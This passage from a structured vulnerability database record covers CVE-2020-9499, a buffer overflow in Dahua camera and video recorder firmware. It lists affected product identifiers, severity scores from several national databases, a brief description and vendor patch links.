                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndExcluding: "2019-12",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:dahuasecurity:n54b2p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
      ],
   },
   cve: "CVE-2020-9499",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 6.5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 7.5,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "JVNDB-2020-003798",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "MULTIPLE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 8.3,
                  confidentialityImpact: "COMPLETE",
                  exploitabilityScore: 6.4,
                  id: "CNVD-2020-22979",
                  impactScore: 10,
                  integrityImpact: "COMPLETE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:M/C:C/I:C/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.2,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "HIGH",
                  exploitabilityScore: 1.2,
                  impactScore: 5.9,
                  integrityImpact: "HIGH",
                  privilegesRequired: "HIGH",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 9.8,
                  baseSeverity: "Critical",
                  confidentialityImpact: "High",
                  exploitabilityScore: null,
                  id: "JVNDB-2020-003798",
                  impactScore: null,
                  integrityImpact: "High",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2020-9499",
                  trust: 1,
                  value: "HIGH",
               },
               {
                  author: "NVD",
                  id: "JVNDB-2020-003798",
                  trust: 0.8,
                  value: "Critical",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2020-22979",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202004-553",
                  trust: 0.6,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down. Dahua The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera",
      sources: [
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
      ],
      trust: 2.16,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2020-9499",
            trust: 3,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
            trust: 0.8,
         },
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   id: "VAR-202004-1823",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
      ],
      trust: 1.6,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
      ],
   },
   last_update_date: "2023-12-18T13:51:55.682000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "DHCC-SA-202004-001",
            trust: 0.8,
            url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
         },
         {
            title: "Patch for Multiple Dahua product buffer overflow vulnerabilities",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/213931",
         },
         {
            title: "Multiple Dahua Product Buffer Error Vulnerability Fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=115746",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-120",
            trust: 1.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.6,
            url: "https://www.dahuasecurity.com/support/cybersecurity/details/727",
         },
         {
            trust: 1.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2020-9499",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-9499",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2020-04-15T00:00:00",
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            date: "2020-04-24T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            date: "2020-04-09T14:15:13.213000",
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            date: "2020-04-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2020-05-12T00:00:00",
            db: "CNVD",
            id: "CNVD-2020-22979",
         },
         {
            date: "2020-04-24T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
         {
            date: "2021-04-19T14:57:26.277000",
            db: "NVD",
            id: "CVE-2020-9499",
         },
         {
            date: "2020-05-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Dahua Classic buffer overflow vulnerability in the product",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2020-003798",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202004-553",
         },
      ],
      trust: 0.6,
   },
}

Vulnerability from fkie_nvd
Published
2020-04-09 14:15
Modified
2024-11-21 05:40
Summary
Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B1CE773D-CA5F-483C-B20C-DAD30A590DDD",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd6al:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "C35F4371-334B-4EA8-8F48-498C81652F7C",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd5a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "083AE420-CAF9-4A2A-8C76-79DD590FA191",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd5a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "1EE24474-EF35-4475-99DD-4B54D6AF0B2D",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9A075994-60D1-40B7-9EF6-8048CBC18764",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7A3C5893-E1D0-4E06-9F7F-058B657E4493",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ptz1a_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F78D2E9E-9909-4130-A146-CA861F7DF341",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ptz1a:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "19B57B9D-0729-48E0-892B-E39AE1F89AB4",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "18CD222C-C95A-4D5E-A763-5D2F74EAEC04",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd50:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "984AD4D5-D689-4150-A1EE-D48B81CBB7C8",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ECBC0BF-171E-49FD-B6AF-CC7B29D39FB7",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:sd52c:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5BA0D206-5BE7-4592-8D3E-641F47164770",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx5842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "9E8CB654-0526-4E7A-8984-8350B39BB4DF",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx5842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "724F4B7D-C8C1-4914-B1D6-B4CB9B1F4093",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx7842h_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3AEBFC1D-9F25-4FDB-A191-D7D6C1C6E234",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx7842h:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5D6E27D8-C608-49E7-8284-5196EDB428DB",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hx2xxx_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A046C7EA-F954-4F36-9ED3-DBA84F1FB2D3",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hx2xxx:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "5B8887C8-C335-4EBB-BC7F-D4F8D8205DAE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:ipc-hxxx5x4x_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "DCD8DCD2-5CEA-420F-860C-11B469D9FF8F",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:ipc-hxxx5x4x:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "F051A1A0-E841-42E7-92A3-E45E4017DCDE",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b1p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F092AA97-7184-4499-BB83-D6204BD4621B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b1p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "FCB3A7FD-63A2-423C-912F-E2E5B4690CF1",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "855B3C5F-CE9D-4FFA-B485-11A8D675F006",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "83B0FAFA-BEF4-4196-A4BC-4CFD6DCF4986",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n42b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "1D0E03DE-1BFA-43AD-9AC6-72A1A1545D4B",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n42b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "B51E9FED-4929-42CC-AA6F-BFF61E8F88C0",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "F20B6467-53DC-4DC6-BCC2-6B6B33ABD65D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "EB41CE1D-1A97-4549-A849-D06F78858CA3",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54a4p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BFA91720-5AE4-48B6-A940-A4DBE650591D",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahua:n54a4p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "D871578A-E282-4AEE-8B7E-5F52011FA9CA",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b2p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "ACD4FD87-1D74-4895-AA89-D26541A55433",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b2p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "7936F0A3-F6DF-47B2-898E-DBE68B369633",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b5p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D5136C6-2355-4782-BF9C-0874DC5B0CDA",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b5p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "195D7533-B2EF-4BC2-B6D6-0B141FB90090",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n52b3p_firmware:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "7180D6E1-6F7F-4EAD-BD51-02C029EFB034",
                     versionEndExcluding: "2019-12",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:h:dahuasecurity:n52b3p:-:*:*:*:*:*:*:*",
                     matchCriteriaId: "03D1AD58-447D-4D30-B9CF-48B5CB743C2B",
                     vulnerable: false,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
         operator: "AND",
      },
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:o:dahuasecurity:n54b2p_firmware:*:*:*:*:*:*:*:*",
